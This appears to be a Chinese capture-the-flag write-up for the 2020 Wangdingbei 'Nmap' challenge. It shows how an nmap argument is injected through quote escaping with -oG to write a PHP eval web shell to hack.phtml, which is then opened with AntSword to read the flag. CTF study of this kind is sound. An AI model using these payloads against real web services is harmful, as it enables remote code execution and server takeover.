命令执行 [网鼎杯 2020 朱雀组]Nmap1

打开题目

输入127.0.0.1

可以得到回显结果,猜测是命令执行,尝试使用|分隔地址与命令

127.0.0.1 | ls

可以看到|\转义,尝试使用;

直接放入Payload:

' <?php @eval($_POST["hack"]);?> -oG hack.php '

尝试修改文件名后缀为phtml

' <?php @eval($_POST["hack"]);?> -oG hack.phtml '

加上扫描的地址:127.0.0.1

127.0.0.1 | ' <?= @eval($_POST["hack"]);?> -oG hack.phtml'

得到

查看扫描列表:

查看写入的文件,即访问hack.phtml

蚁剑连接

在根目录找到了flag

相关推荐
xianrenli385 小时前
android特许权限调试
android
*拯8 小时前
Uniapp Android/IOS 获取手机通讯录
android·ios·uni-app
天天打码10 小时前
Lynx-字节跳动跨平台框架多端兼容Android, iOS, Web 原生渲染
android·前端·javascript·ios
lilili啊啊啊12 小时前
iOS safari和android chrome开启网页调试与检查器的方法
android·ios·safari
Blue.ztl14 小时前
菜鸟之路day31一一MySQL之多表设计
android·数据库·mysql
练习本18 小时前
Android系统架构模式分析
android·java·架构·系统架构
每次的天空1 天前
Kotlin 内联函数深度解析:从源码到实践优化
android·开发语言·kotlin
练习本1 天前
Android MVC架构的现代化改造:构建清晰单向数据流
android·架构·mvc
早上好啊! 树哥1 天前
android studio开发:设置屏幕朝向为竖屏,强制应用的包体始终以竖屏(纵向)展示
android·ide·android studio
YY_pdd1 天前
使用go开发安卓程序
android·golang